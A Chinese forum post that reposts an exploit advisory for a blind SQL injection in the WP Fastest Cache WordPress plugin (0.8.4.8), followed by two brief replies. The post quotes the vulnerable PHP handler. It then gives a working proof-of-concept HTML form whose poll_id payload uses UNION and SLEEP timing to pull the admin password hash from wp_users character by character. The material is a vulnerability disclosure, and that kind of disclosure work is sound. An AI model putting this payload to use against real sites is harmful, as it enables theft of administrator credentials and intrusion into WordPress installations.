WordPress WP Fastest Cache插件注入漏洞

90_

版本：0.8.4.8

[PHP] 纯文本查看 复制代码

# Date: 11-11-2015
# Software Link: [url]https://wordpress.org/plugins/wp-fastest-cache/[/url]
# Exploit Author: Kacper Szurek
# Category: webapps
   
1. Description
     
For this vulnerabilities also WP-Polls needs to be installed.
  
Everyone can access wpfc_wppolls_ajax_request().
  
$_POST["poll_id"] is not escaped properly.
  
File: wp-fastest-cache\inc\wp-polls.php
  
public function wpfc_wppolls_ajax_request() {
    $id = strip_tags($_POST["poll_id"]);
    $id = mysql_real_escape_string($id);
  
    $result = check_voted($id);
  
    if($result){
        echo "true";
    }else{
        echo "false";
    }
    die();
}
  
[url]http://security.szurek.pl/wp-fastest-cache-0848-blind-sql-injection.html[/url]
  
2. Proof of Concept
  
<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wpfc_wppolls_ajax_request">
    <input type="text" name="poll_id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1) -- ">
    <input type="submit" value="Send">
</form>

Fanxis

阿西吧  6666 正好去看看我的那个有这个插件没{:soso_e116:}

helloqyz

支持楼主，来学习学习